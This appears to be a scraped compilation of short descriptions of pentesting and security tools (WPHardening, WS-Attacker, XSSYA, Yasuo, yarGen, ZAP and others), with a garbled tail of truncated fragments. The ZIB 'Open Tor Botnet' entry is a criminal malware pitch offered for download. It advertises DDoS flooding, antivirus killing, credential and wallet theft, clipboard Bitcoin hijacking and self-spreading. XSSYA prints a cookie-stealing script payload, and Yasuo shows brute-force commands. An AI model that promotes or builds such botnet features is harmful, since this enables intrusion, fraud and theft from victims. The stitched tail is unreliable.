-o FILE, --output=FILE
Write log report to FILE.log
Examples
Check a WordPress Project

Before using the tool, we must ensure that our working
directory is WordPress.
$ python wphardening.py -d /home/path/to/wordpress -v
Change permissions
This option is to add the correct permissions to files and
directories.
$ python wphardening.py -d /home/path/to/wordpress -chmod -v
Remove files that are not used

Part of the fortification of any system is to remove those files,
directories or components required.
$ python wphardening.py -d /home/path/to/wordpress -remove -v
Create your robots.txt file

WordPress default does not incorporate the robots.txt file with
this option poemos customize our robots.txt
$ python wphardening.py -d /home/path/to/wordpress -robots -v
For more information robots.txt

Remove all fingerprinting and Version
$ python wphardening.py -d /home/path/to/wordpress -fingerprinting -v
Check a TimThumb library

$ python wphardening.py -d /home/path/to/wordpress -timthumb -v
Create Index file

This file is created as a way to avoid sailing in a directory.
$ python wphardening.py -d /home/path/to/wordpress -indexes -v
Download Plugins security

The following is a list of the most commonly used security
plugins that you can download automatically:
AntiVirus
Bad Behavior
Block Bad Queries
Exploit Scanner
Latch
Simple History
Stream
WP Security Scan
WP-DBManager
$ python wphardening.py -d /home/path/to/wordpress -plugins
Wizard generated wp-config.php

This command automatically creates a file called wp-configwphardening.php which can then rename it.
$ python wphardening.py -d /home/path/to/wordpress --wpconfig
WPHardening update
With this option you can always have the latest version of
WPHardening.
$ python wphardening.py --update
Use all options

$ python wphardening.py -d /home/path/to/wordpress -c -r
-f -t --wp-config --indexes --plugins -o /home/user/
wphardening.log
Download WPHardening 1.5

WS-ATTACKER - MODULAR FRAMEWORK FOR WEB
SERVICES PENETRATION TESTING
XML-based SOAP Web Services are a widely used technology,

which allows the users to execute remote operations and
transport arbitrary data. It is currently adapted in Service
Oriented Architectures, cloud interfaces, management of
federated identities, eGovernment, or millitary services. The
wide adoption of this technology has resulted in an emergence
of numerous - mostly complex - extension specifications.
Naturally, this has been followed by a rise in large number of
Web Services attacks.
By implementing common web applications, the developers

evaluate the security of their systems by applying different
penetration testing tools. However, in comparison to the wellknown attacks as SQL injection or Cross Site Scripting, there
exist no penetration testing tools for Web Services specific
attacks. With WS-Attacker we intend to close this gap and
provide developers and penetration testers automatic methods
for detecting Web Services specific attacks. The tool currently
supports the following attacks:
SOAPAction Spoofing
WS-Addressing Spoofing
Various XML Denial of Service variants
XML Signature Wrapping
DownloadWS-Attacker
XIAOPAN OS - PENTESTING DISTRIBUTION FOR
WIRELESS SECURITY ENTHUSIASTS
Xiaopan OS is an easy to use software package for beginners

and experts that includes a number of advanced toolsto
penetrate wireless networks.Based on the Tiny Core Linux
(TCL) operating system (OS), it has a slick graphical user
interface (GUI) requiring no need for typing Linux commands.
Xiaopan OS is Windows, Mac and Linux compatible and users
can simply install and boot this ~70mb OS through a USB pen
drive or in a virtual machine (VM) environment.
Alternatives
There are a number of professional operating systems that

have been developed specifically for pentesting and security
auditing which all are based on Linux. These include
Kali,BackTrackandWiFiway. What sets Xiaopan OS apart
from its competitors is that it Xiaopan OS is simple to use and
just works, depending on a number ofvariablesand providing
you have all the right hardware of course.
Tools
Xiaopan OS includes a number of tools to hack WiFi Protected

Setup (WPS), WiFI Protected Access (WPA) and
WirelessEquivalentPrivacy (WEP) encrypted networks:
Reaver:newly developed application with the ability to

brute force crack WPS (WPA / WPA2) pins.
Inflator:this is the GUI version of command line reaver.
Aircrack-ng:the major backbone of many other Xiaopan
tools including FeedingBottle (FB) and Minidwep with the
ability to attack WPA networks through a dictionary attack
and WEP networks through collecting and injecting
packets.
FeedingBottle: so easy a baby could use it! FB is
essentially the Aircrack-ng GUI and was created by Beini.
Minidwep: is similar to FB but has a better and similar
GUI that is even easier to use than FB. The added
advantage of Minidwep is that you can also run Reaver
and Inflator from here as well.
Xfe:this is a simple file manager similar to say windows
explorer
DownloadXiaopan OS
XPL-SEARCH - SEARCH EXPLOITS IN MULTIPLE EXPLOIT
DATABASES
XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* MIlw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE
TO RUN THE SCRIPT

PHP Version (cli) 5.5.8 or higher
php5-cli
cURL support
php5-curl
Lib
Enabled
Lib
cURL Version
7.40.0 or higher
allow_url_fopen
On
Permission
Writing & Reading
ABOUT DEVELOPER
Author_Nick
CoderPIRATA
Author_Name
Eduardo
Email
coderpirata@gmail.com
Blog
http://coderpirata.blogspot.com.br/
Twitter
https://twitter.com/coderpirata
Google+
https://plus.google.com/
103146866540699363823
Pastebin
http://pastebin.com/u/CoderPirata
Github
https://github.com/coderpirata/
"CHANGELOG"
0.1 - [02/07/2015]
- Started.
0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.
0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.
0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.
0.5 - [29/08/2015]
- Added search by Author.

0.6 - [09/09/2015]
- Now displays the author of the exploit.
* Does not work with IntelligentExploit.
- Changes in search logs.
0.7 - [11/09/2015]
- Added search in CVE.
* ID.
* Simple search - id 6.
- Bug in exploit-db search, "papers" fixed.
- Added standard time of 60 seconds for each request.
- file_get_contents() was removed from "browser()".
- Code of milw00rm search has been modified.
- Changes in search logs.
- Added date.
0.7.1 - [17/09/2015]
- Bug in milw00rm solved
0.8 - [05/10/2015]
- Added shebang.
- Commands "save", "save-log" and "save-dir" have been
modified.
- Added "no-db" option.
- GETOPT() modified - Thanks Jack2.
- Bug on save-dir solved.
- Others minor bugs solved.
Screenshot
Download XPL-SEARCH
XPLICO V1.1.1 - OPEN SOURCE NETWORK FORENSIC
ANALYSIS TOOL (NFAT)
The goal of Xplico is extract from an internet traffic capture the

applications data contained.
For example, from a pcap file Xplico extracts each email (POP,
IMAP, and SMTP protocols), all HTTP contents, each VoIP call
(SIP), FTP, TFTP, and so on. Xplico isnt a network protocol
analyzer. Xplico is an open source Network Forensic Analysis
Tool (NFAT).
Features
Protocols supported: HTTP, SIP, IMAP, POP, SMTP,

TCP, UDP, IPv6, ;
Port Independent Protocol Identification (PIPI) for each
application protocol;
Multithreading;
Output data and information in SQLite database or Mysql
database and/or files;

At each data reassembled by Xplico is associated a XML
file that uniquely identifies the flows and the pcap
containing the data reassembled;
Realtime elaboration (depends on the number of flows,
the types of protocols and by the performance of computer
-RAM, CPU, HD access time, -);
TCP reassembly with ACK verification for any packet or
soft ACK verification;
Reverse DNS lookup from DNS packages contained in the
inputs files (pcap), not from external DNS server;
No size limit on data entry or the number of files entrance
(the only limit is HD size);
IPv4 and IPv6 support;
Modularity. Each Xplico component is modular. The input
interface, the protocol decoder (Dissector) and the output
interface (dispatcher) are all modules;
The ability to easily create any kind of dispatcher with
which to organize the data extracted in the most
appropriate and useful to you;
Download Xplico
XSSYA V2.0 - CROSS SITE SCRIPTING SCANNER &
VULNERABILITY CONFIRMATION
XSSYA Cross Site Scripting Scanner & Vulnerability

Confirmation written in python scripting language confirm the
XSS Vulnerability in two method first work by execute the
payload encoded to bypass Web Application Firewall which is
the first methodrequest and responseif it respond 200 it turn
toMethod2which search that payload decoded in web page
HTML code if it confirmed get the last step which is execute
document.cookie to get the cookie
What have been changed?
XSSYA v 2.0 has more payloads; library contains 41 payloads

to enhance detection level
XSS scanner is now removed from XSSYA to reduce false
positive
URLs to be tested used to not allow any character at the end
of the URL except (/ - = -?) but now this limitation has been
removed
Whats new in XSSYA V2.0?
Custom Payload 1 You have the ability to Choose your

Custom Payload Ex: and you can encode your custom payload
with different types of encodings like (B64 HEX

URL_Encode - HEX with Semi Columns)
(HTML Entities Single & Double Quote only - brackets And
or Encode all payload with HTML Entities) This feature will
support also XSS vulnerability confirmation method which is
you choose you custom payload and custom Encoding execute
if response 200 check for same payload decoded in HTM code
page.
HTML5 Payloads XSYSA V2.0 contains a library of 44 HTLM5
payloads
XSSYA have a Library for the most vulnerable application with
XSS Cross site scripting and this library counting (Apache
WordPress PHPmy Admin) If you choose apache application
it give the CVE Number version of Apache which is affected
and the link for CVE for more details so it will be easy to search
for certain version that is affected with XSS
XSSYA has the feature to convert the IP address of the
attacker to (Hex, Dword, Octal) to bypass any security
mechanism or IPS that will be exist on the target Domain
XSSYA check is the target is Vulnerable to XST (Cross Site
Trace) which it sends custom Trace Request and check if the
target domain is Vulnerable the request will be like this:
TRACE / HTTP/1.0
Host: demo.testfire.net
Header1: < script >alert(document.cookie);
XSSYA Features
* Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG
IP)
*XSSYA Continue Library of Encoded Payloads To Bypass

WAF (Web Application Firewall)
* Support Saving The Web HTML Code Before Executing
the Payload Viewing the Web HTML Code into the Screen or
Terminal
More details
http://labs.dts-solution.com/xssya-forget-the-browser-for-xssby-yehia-mamdouh/
DownloadXSSYA v2.0
YARGEN - A GENERATOR FOR YARA RULES (FOR
MALWARE RESEARCHERS)
yarGen is a generator for Yara rules.

What does yarGen do?
The main principle is the creation of yara rules from strings

found in malware files while removing all strings that also
appear in goodware files.
Since version 0.14.0 it uses naive-bayes-classifier by Mustafa
Atik and Nejdet Yucesoy in order to classify the string and
detect useful words instead of compression/encryption

garbage.
Since version 0.12.0 yarGen does not completely remove the
goodware strings from the analysis process but includes them
with a very low score. The rules will be included if no better
strings can be found and marked with a comment /* Goodware
rule */. Force yarGen to remvoe all goodware strings with -excludegood. Also since version 0.12.0 yarGen allows to place
the "strings.xml" from PEstudio in the program directory in
order to apply the blacklist definition during the string analysis
process. You'll get better results.
The rule generation process tries to identify similarities between
the files that get analyzed and then combines the strings to so
called "super rules". Up to now the super rule generation does
not remove the simple rule for the files that have been
combined in a single super rule. This means that there is some
redundancy when super rules are created. You can supress a
simple rule for a file that was already covered by super rule by
using --nosimple.
Installation
1. Make sure you have at least 2GB of RAM on the machine

you plan to use yarGen
2. Clone the git repository
3. Install all dependancies with sudo pip install pickle
scandir lxml naiveBayesClassifier
4. Unzip the goodware database (e.g. 7z x goodstrings.db.zip.001)
5. See help with python yarGen.py --help
Memory Requirements
Warning: yarGen pulls the whole goodstring database to
memory and uses up to 2 GB of memory for a few seconds.
Command Line Parameters

usage: yarGen.py [-h] [-m M] [-g G] [-u] [-c] [-o
output_rule_file]
[-p prefix] [-a author] [-r ref] [-l
min-size] [-z min-score]
[-s max-size] [-rc maxstrings] [-nr] [oe] [-fs size-in-MB]
[--score] [--inverse] [--nodirname] [-noscorefilter]
[--excludegood] [--nosimple] [--nomagic]
[--nofilesize]
[-fm FM] [--noglobal] [--nosuper] [-debug]
yarGen
optional arguments:
-h, --help
-m M
Path to scan for malware
-g G
Path to scan for goodware (dont
use the database

shipped with yaraGen)
-u
Update local goodware database
(use with -g)

-c
Create new local goodware database
(use with -g)

-o output_rule_file
Output rule file
-p prefix
Prefix for the rule description
-a author
Author Name
-r ref
Reference
-l min-size
Minimum string length to consider
(default=8)
-z min-score
Minimum score to consider
(default=5)
-s max-size
Maximum length to consider
(default=128)
-rc maxstrings
Maximum number of strings per rule
(default=20,
intelligent filtering will be
applied)
-nr
Do not recursively scan
directories
-oe
Only scan executable extensions
EXE, DLL, ASP, JSP,

PHP, BIN, INFECTED
-fs size-in-MB
Max file size in MB to analyze
(default=3)
--score
Show the string scores as comments
in the rules
--inverse
Show the string scores as comments
in the rules
--nodirname
Don't use the folder name variable
in inverse rules
--noscorefilter
Don't filter strings based on
score (default in
'inverse' mode)
--excludegood
Force the exclude all goodware
strings
--nosimple
Skip simple rule creation for
files included in super

rules
--nomagic
Don't include the magic header
condition statement
--nofilesize
Don't include the filesize
condition statement
-fm FM
Multiplier for the maximum
'filesize' condition
(default: 5)
--noglobal
Don't create global rules
--nosuper
Don't try to create super rules
that match against

various files
--debug
Debug output
Best Practice
See the following blog post for a more detailed description on

how to use yarGen for YARA rule creation: How to Write
Simple but Sound Yara Rules
Examples
Use the shipped database (FAST) to create some rules

python yarGen.py -m X:\MAL\Case1401
Use the shipped database of goodware strings and scan the

malware directory "X:\MAL" recursively. Create rules for all files
included in this directory and below. A file named
'yargen_rules.yar' will be generated in the current directory.
Show the score of the strings as comment
yarGen will by default use the top 20 strings based on their
score. To see how a certain string in the rule scored, use the "-score" parameter.
python yarGen.py --score -m X:\MAL\Case1401
Use only strings with a certain minimum score

In order to use only strings for your rules that match a certain
minimum score use the "-z" parameter. It is a good pratice to
first create rules with "--score" and than perform a second run
with a minimum score set for you sample set via "-z".
python yarGen.py --score -z 5 -m X:\MAL\Case1401
Preset author and reference

python yarGen.py -a "Florian Roth" -r "http://goo.gl/
c2qgFx" -m /opt/mal/case_441 -o case441.yar
Exclude strings from Goodware samples

python yarGen.py --excludegood -m /opt/mal/case_441
Supress simple rule if alreay covered by a super rules

python yarGen.py --nosimple -m /opt/mal/case_441
Show debugging output

python yarGen.py --debug -m /opt/mal/case_441
Create a new goodware strings database

python yarGen.py -c -g C:\Windows\System32
Update the goodware strings database (append new

strings to the old ones)
python yarGen.py -u -g "C:\Program Files"
Inverse rule creation (still beta)

In order to create some inverse rules on goodware, you have to
prepare a directory with subdirectories in which you include all

versions of the files you want to create inverse rules for with
their original name and in their original folder. If that sounds
strange, let me give you an example.
E.g. you want to create inverse rules for all Windows
executables in the System32 folder, you have to create a
goodware archive with the following directory structure:
G:\goodware
WindowsXP
System32 - all files
Windows2003
Windows2008R2
yarGen than creates rules that identify e.g. file name "cmd.exe"
in path ending with "System32" and checks if the file contains
certain necessary strings. If the strings don't show up, the rule
will fire. This indicates a replaced system file or malware file
that tries to masquerade as a system file.
python yarGen.py --inverse -oe -m G:\goodware\
You can also instruct yarGen not to include the file path but
solely rely on the filename.
python yarGen.py --inverse -oe --nodirname -m G:\goodware
\
DownloadyarGen
YASUO - SCANS FOR VULNERABLE & EXPLOITABLE
3RD-PARTY WEB APPLICATIONS
Yasuo is a ruby script that scans for vulnerable 3rd-party web

applications.
While working on a network security assessment (internal,
external, redteam gigs etc.), we often come across vulnerable
3rd-party web applications or web front-ends that allow us to
compromise the remote server by exploiting publicly known
vulnerabilities. Some of the common & favorite applications are
Apache Tomcat administrative interface, JBoss jmx-console,
Hudson Jenkins and so on.
If you search through Exploit-db, there are over 10,000

remotely exploitable vulnerabilities that exist in tons of web
applications/front-ends and could allow an attacker to
completely compromise the back-end server. These
vulnerabilities range from RCE to malicious file uploads to SQL
injection to RFI/LFI etc.
Yasuo is built to quickly scan the network for such vulnerable
applications thus serving pwnable targets on a silver platter.
Setup / Install
You would need to install the following gems:

gem install ruby-nmap net-http-persistent mechanize
colorize text-table
Details
Yasuo provides following command-line options:

-r :: If you want Yasuo to perform port scan, use this switch to
provide an IP address or IP range or an input file with new-line
separated IP addresses
-s :: Provide custom signature file. [./yasuo.rb -s
mysignatures.yaml -f nmap.xml] [Default - signatures.yaml]
-f :: If you do not want Yasuo to perform port scan and already
have an nmap output in xml format, use this switch to feed the
nmap output
-n :: Tells Yasuo to not ping the host while performing the port
scan. Standard nmap option.
-p :: Use this switch to provide port number(s)/range
-A :: Use this switch to scan all the 65535 ports. Standard nmap
option.
-b [all/form/basic] :: If the discovered application implements
authentication, use this switch to brute-force the auth. "all" will
brute-force both form & http basic auth. "form" will only brute-
force form-based auth. "basic" will only brute-force http basic

auth.
-t :: Specify maximum number of threads
-h :: Well, take a guess
Examples
./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form
The above command will perform port scan against 127.0.0.1

on ports 80, 8080, 443 and 8443 and will brute-force login for
all the applications that implement form-based authentication.
./yasuo -f my_nmap_output.xml -b all
The above command will parse the nmap output file

"my_nmap_output.xml" and will brute-force login for all the
applications that implement form-based and http basic
authentication.
DownloadYASUO
YAVOL - GUI FOR VOLATILITY FRAMEWORK AND YARA
This is just another GUI for volatility and yara which could make
someone's life easier. It is inteded for Incident responders for
quick examination of a memory image. Results are stored in
sqlite db for reuse.
1. INSTALLATION
Clone repo
git clone https://Ft44k@bitbucket.org/Ft44k/

yavol.git
default forder for yara sigs is /yara_rules
2. PREREQUISITES
you need to have installed Python (2.7), PyQt4, and sqlite3
DownloadYaVol
ZAP 2.4.2 - PENETRATION TESTING TOOL FOR TESTING
WEB APPLICATIONS
The Zed Attack Proxy (ZAP) is an easy to use integrated
penetration testing tool for finding vulnerabilities in web

applications.
It is designed to be used by people with a wide range of
security experience and as such is ideal for developers and
functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that
allow you to find security vulnerabilities manually.
Release 2.4.2
The following changes were made in this release:

Enhancements:
Issue 1306 : Java PermSize command line flag removed
in Java 8
Issue 1593 : Auto-scroll in Spider tab
Issue 1600 : Dont report X-Frame-Options alert on 403
and 404 pages
Issue 1654 : httpSessions/createEmptySession should
initialize a site that was not previously visited
Issue 1702 : Add "recurse" option to the spider API
Issue 1715 : Unable to pass arguments when launching
ZAP from the command line on Mac OS X
Issue 1766 : Remove context via the API
Issue 1768 : Update to use a more recent user-agent
Issue 1778 : Passive scan AJAX spider requests
Issue 1790 : Move Buffer Overflow Scanner from Beta to
Release
Issue 1793 : Allow active scan scripts to check if the scan
was stopped
Issue 1795 : Allow JVM options to be configured via GUI
Issue 1799 : Minor Feature Request: Allow URL to be
pasted into start Spider dialog.
Issue 1802 : Minor Enhancement: Change active Pause
Button to a Play button

Issue 1849 : Option to merge related issues in reports
Issue 1857 : Libraries that were updated
Issue 1865 : Increase maximum db size
Bug fixes:
Issue 1760 : Unable to initialize home directory! xml/
config.xml (No such file or directory)
Issue 1763 : Automatic check for updates fails to report
new versions
Issue 1770 : Exceptions when calling (some) context API
actions in daemon mode
Issue 1771 : For OSX the zap.sh in the core download
hard-codes the relative java location
Issue 1772 : On OS X, Found Java version lies
Issue 1777 : "Cannot locate configuration source
null.policy" after opening "Active Scan" dialogue
Issue 1781 : ZAP errors with "Unsupported option 'psn_x_xxxxxxx'" on OS X
Issue 1784 : NullPointerException when active scanning
through the API with a target without scheme
Issue 1785 : Plugin enabled even if dependencies are not,
"hangs" active scan
Issue 1787 : Context not used by the Spider even if
selected
Issue 1788 : Scan Progress Pane Needs Sorting Change
Issue 1789 : Forced Browse/AJAX Spider messages not
restored to Sites tab
Issue 1792 : Report not generated in daemon mode
Issue 1798 : Stop Attack Feature Locks up ZAP?
Issue 1804 : Disable processing of XML external entities
by default
Issue 1805 : ZAP API might not return the response in
requested format on errors
Issue 1858 : Spider might report wrong progress after
finishing
Issue 1872 : EDT accessed in daemon mode
DownloadZAP 2.4.2
ZER0 - SECURED FILE DELETION MADE EASY
Zer0 is a user friendly file deletion tool with a high level of

security.
With Zer0, you'll be able to delete files and to prevent file
recovery by a 3rd person. So far, no user reported an efficient
method to recover a file deleted by Zer0.
Features
User friendly HMI : Drag'n'drop, 1 click and the job is

done !
High security file deletion algorithm
Multithreaded application core : Maximum efficiency
without freezing the application.
Internationalization support.
DownloadZer0
ZERONET - DECENTRALIZED WEBSITES USING BITCOIN
CRYPTO AND BITTORRENT NETWORK
Decentralized websites using Bitcoin crypto and the BitTorrent

network - http://zeronet.io
Why?
We believe in open, free, and uncensored network and

communication.
No single point of failure: Site remains online so long as at
least 1 peer serving it.
No hosting costs: Sites are served by visitors.
Impossible to shut down: It's nowhere because it's

everywhere.
Fast and works offline: You can access the site even if
your internet is unavailable.
Features
Real-time updated sites

Namecoin .bit domains support
Easy to setup: unpack & run
Clone websites in one click
Password-less BIP32 based authorization: Your account
is protected by same cryptography as your Bitcoin wallet
Built-in SQL server with P2P data synchronization: Allows
easier site development and faster page load times
Tor network support
TLS encrypted connections
Automatic, uPnP port opening
Plugin for multiuser (openproxy) support
Works with any browser/OS
How does it work?
After starting zeronet.py you will be able to visit zeronet

sites using http://127.0.0.1:43110/
{zeronet_address} (eg.http://
127.0.0.1:43110/1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4V
r).
When you visit a new zeronet site, it tries to find peers

using the BitTorrent network so it can download the site
files (html, css, js...) from them.
Each visited site becomes also served by you.
Every site contains a site.json which holds all other files
in a sha512 hash and a signature generated using site's
private key.
If the site owner (who has the private key for the site
address) modifies the site, then he/she signs the new
content.json and publishes it to the peers. After the
peers have verified the content.json integrity (using the

signature), they download the modified files and publish
the new content to other peers.
How to join?
Windows
Download ZeroBundle package that includes Python 2.7.9

and all required libraries
Unpack to any directory
Run zeronet.cmd
It downloads the latest version of ZeroNet then starts it
automatically.
Alternative method for Windows by installing Python
Install Python 2.7
Install Python Greenlet
Install Python Gevent
Install Python MsgPack
Download and extract ZeroNet to any directory
Run start.py
Linux
Debian
sudo apt-get update

sudo apt-get install msgpack-python python-gevent
wget https://github.com/HelloZeroNet/ZeroNet/
archive/master.tar.gz
tar xvpfz master.tar.gz
cd ZeroNet-master
Start with python zeronet.py
Open http://127.0.0.1:43110/ in your browser and enjoy! :)
Other Linux or without root access

Check your python version using python --version if the
returned version is not Python 2.7.X then try python2 or
python2.7 command and use it from now

wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py --user gevent msgpack-python
Start with python zeronet.py
Mac
Install Homebrew
brew install python

pip install gevent msgpack-python
Download, Unpack, run python zeronet.py
Vagrant
vagrant up
Access VM with vagrant ssh
cd /vagrant
Run python zeronet.py --ui_ip 0.0.0.0
Open http://127.0.0.1:43110/ in your browser
Docker
docker run -p 15441:15441 -p 43110:43110 nofish/
zeronet
Open http://127.0.0.1:43110/ in your browser
Download ZeroNet
ZIB - THE OPEN TOR BOTNET
General information and instructions.
The Open Tor Botnet requires the installation and configuration

of bitcoind, however I neglect to detail this here out of a lack of
time.
This bot-net is fully undetectable and bypasses all antivirus
through running on top of Python27's pyinstaller, which is used
for many non-Trojan computer programs. The only hypothetical
possibility of detection comes from the script, however, the
script contains randomized-looking data through using a
randomized AES key and initialization vector, meaning this is a
non-issue.
ZIB.py is the main project file.
intel.py is the chat bot for handling automatic transactions and
client authentication.
compileZIB.py is used by intel.py, and is started in the
background using chp.exe
ZIB_imports.txt contains all the Python module imports that ZIB
uses. They're appended to the script during compilation.
btcpurchases.txt includes all the Bitcoin payments that are
pending. Pending transactions older than 24 hours are deleted.

channels.txt includes all completed BTC payments.
Point your webserver to C:\Python27\dist\ for hosting the bot
executables.
chp.exe is required in the local dir.
For the IRC server, run bircd, set up an oper with the username
Zlo and password RUSSIA!@#$RUSSIA!@#$RUSSIA!@#
$RUSSIA!@#$. For the max users per ip set to 0 because tor
users all connect from 127.0.0.1 and look the same to the
IRCd. Keep all scripts in C:\Python27\Scripts.
Put nircmd in the local directory for editing file dates.
Features
ZIB is an IRC-based, Bitcoin-funded bot network that runs

under Tor for anonymity.
ZIB is coded totally from scratch.
ZIB uses the Department of Defense standard for
encryption of Top Sercret files as one methods of
generating fully undetectable binaries every time!
ZIB creates a new binary for every client with varying file
sizes, creation dates, and rot13->zlib->base64>AES-256(random key+IV) encrypted strings.
ZIB is fully undetectable (FUD) to Anti-Virus.
ZIB has an automated system for handling payments,
providing bot-net binaries, and creating bot-net IRC
channels.
All bot networks on a ZIB network require a password to
join.
ZIB uses passworded user-based authentication, handled
through our Zlo intelligence bot, so you don't have to worry
about channel password, main password, or bot
compromise. Normal users can't create their own
channels. All IRC functionalities are handled by the Zlo
IRC intelligence bot. You can do authenticated, single bot
commands through Zlo, or set up a user session on your
bots, which is slightly less secure.

Paid users get unlimited bot space per channel.
Our bot has been tested on and is fully compatible with
Windows Server 2008 R2 32-bit, Windows XP SP1 & SP3
32-bit, Windows 7, and Windows 8 64-bit.
Features
Multi-threaded HTTP/s (layer7 [Methods: TorsHammer,

PostIt, Hulk, ApacheKiller, Slowloris, GoldenEye]), TCP/
SSL, and fine-tuned UDP flooding. Ability to flood hidden
services, or attack via the clearnet. 66 randomized DDoS
user-agents and referers. All methods send randomized
data, bypass firewalls, filtering, and caching. ZIB also
comes with FTP flood, and TeamSpeak flood.
Undetectable ad-fraud smart viewer that's fully compatible
with Firefox, Tor Browser Bundle, Portable Firefox,
Internet Explorer, Google Chrome, Opera, Yandex, Torch,
FlashPeak SlimBrowser, Epic Privacy Browser, Baidu,
Maxthon, Comodo IceDragon, and QupZilla.
Download & Execute w/ optional SHA256 verification.
Update w/ optional SHA256 verification.
Chrome password recovery.
Each bot can act as a shell booter and utilize external php
shells for attacks.
Replace Bitcoin addresses in clipboard with yours.
FileZilla password recovery.
Fully routed through Tor.
File, registry, startup folder, and main/daemon/tor process
persistence.
Installation and use is completely hidden from bots.
0/60 Fully undetectable to Antivirus.
File download/upload.
Process status, creator, and killer.
Undetectable, instant obfuscation when generating new
binaries.
Self spreading.
All bot files are SHA256 hash verified. Broken/corrupted
files get replaced.
Bypasses AntiVirus Deep-Scan.
Bot location varies, depending on administrative access.
IRC nickname format: Country[version]windows version|
CPU bits|User Privileges|CPU cores|random characters.
Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may
be having issues (shows up as 32-bit).
Disables various windows functions WITHOUT giving the
user warnings!
Disables Microsoft Windows error reporting, sending
additional data, and error logging - System-wide as
administrator, and on a per-user basis.
Disables User Access Control (UAC) - System-wide as
administrator, and on a per-user basis.
Disables Windows Volume Shadow Copy Backup Service
(vss) - System-wide as administrator.
Disables System Restore Service (srservice) - SystemWide as administrator.
Disables System Restore - System-Wide as administrator.
Melts on execution. Original file gets deleted. Should
delete the file out of the temporary folder, if used with a
binder.
Multi-threaded mass SSH scanner that saves servers are
on the bot's HDD encoded with base64 without duplicates,
or honeypots. Four integrated password lists of increasing
difficulty [A,B,C,D], or brute force with min/max characters
(supports numbers, upper/lowercase letters, symbols).
Cracked routers are used for UDP/TCP/HTTP/ICMP
flooding. UDP flood requires having the routers download
a python script, and the majority of routers won't have
Python. Has the ability to be used to take down DDoSprotected servers from scanning with just one bot. The
Open Tor Botnet optionally will scan under Tor, multiple
ports at once, ip range/s [A/B/C] or randomized IPs,

optionally block government IPs, blocks reserved IPv4
addresses aside from the user's LAN. BotKiller with file
scanning [kills .exe, .bat, .scr, .pif, .dll, .lnk, .com] in
AppData, Startup, etc and has been successful against
NanoCore, Andromeda, AGhost Silent Miner, Plasma
HTTP/IRC/RAT, and almost every HackForums bot. The
botkiller utilizes process scanning with file deletion, and
registry scanning.
Mutex. No duplicate IRC connections.
Amazing error handling, install rate, detection ratio, and
persistence.
Completely native malware. No .NET framework, or
Python installation required!
Installs to the startup folder & AppData with a registry
RUN key.
Kills all popular anti-virus and prevents A/V installation.
Will disable Anti-Virus which have rootkits, through
deleting important A/V dlls.
BotKiller, scanner, and A/V killer are optional. You could
easily run the Open Tor botnet as a back-up for your bots,
or install other software on them as back-up. The network
control system is highly scaleable. Duel-process and duelfile persistence. Files processes are re-created nearly
instantly, after being removed.
Recovers File-Zilla logins, which is great for getting SSH,
and FTP logins.
Automatically removes some ad-ware.
Contains an Omegle spreader which spreads either a link
through social engineering tactics, or a Skype account
with every line of text being completely unique in order to
avoid detection. Always waits for the Omegle stranger to
type a message before responding with a reply. Shows
stranger typing, and writes messages human-like. Multithreaded.
Deletes zone identifier on all bot files, Tor, download &
executed files, and update files. This means that you don't
get the "Would you like to run this program?" dialog, and it
runs completely hidden.
Detects all Windows operating systems from Windows 95,
ME, to 8. Will show Windows 10 as just Windows, or W8.
Text-To-Speech with speaker detection.
Duplicate nick-name handling, and ping-out handling.
Tor is downloaded directly from the Tor Project - It only
needs to be downloaded once, but still has persistence.
Grabs the bot IP address on startup, has the ability to
disable/enable bot command response, view status of ssh
scanner/omegle spreading/ddos/botkiller and start/stop
them.
Functionality to kill the bot instance, uninstall ZIB, grab full
OS info, check if a host on a certain port is online/offline
using TCP connect and a full HTTP request whilst
checking the reply for server status related information.
Check if a process is running, how many are running, and
list directories. Use \ instead of C:\, e.x !dir \ as some
people run their main operating system on non-standard
drive letters, especially on servers.
Upload specific files of your choosing that exist on a bot's
computer to your FTP server. Files that can be uploaded
could include BTC wallets.
Read files in plain-text off zombie computers. View
amount of scanned SSH servers. Kill processes. The bot
will tell you about missing command parameters, if a
certain parameter contains the wrong data-type, etc.
Errors from executing a command are outputted to the
IRC channel without flooding the chat.
Commands are ran mutli-threaded and con-currently. This
means your bots wont freeze up each time you run a
command.
Download Zib-Trojan

Tech Tools For Activism - Pentesting - Penetration Testing - Hacking - #OpNewBlood

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Tech Tools For Activism - Pentesting - Penetration Testing - Hacking - #OpNewBlood

Hochgeladen von

Copyright:

Verfügbare Formate

TOOLS FOR PENTESTERS

0D1N - TOOL FOR AUTOMATING CUSTOMIZED ATTACKS

Web security tool to make fuzzing at HTTP inputs, made in C

brute force passwords in auth forms

require libcurl-dev or libcurl-devel(on rpm linux based)

need libcurl to run

This tool create an rogue Wi-Fi access point , purporting to

Recommended to use Kali linux.

Install DHCP in Debian-based

Install DHCP in redhat-based

Etter.dns: Edit etter.dns to loading module dns spoof.

Deauth Attack: kill all devices connected in AP (wireless

connect to AP,Probe requests can be sent by anyone with a

2nd March 2015 - London, UK - As cyber security continues to

ability to scan just one target or website and is a further step in

User-friendly and competitively priced, Acunetix Vulnerability

areas; including speed, the strongest support of modern

Acunetix Online Vulnerability Scanner acts

Leverages Acunetix leading web application scanner

Building on Acunetix advanced web scanning technology,

Acunetix OVS scans your website for vulnerabilities without

And Acunetix OVS does not stop at web vulnerabilities.

Getting Acunetix on your side is easy sign up in minutes,

Acunetix Online Vulnerability Scanner

Acunetix, the pioneer in automated web application security

been such a high priority and a cost-effective investment. The

Latest automation functionality makes Acunetix not only even

With WordPress sites having exceeded 74 million in number, a

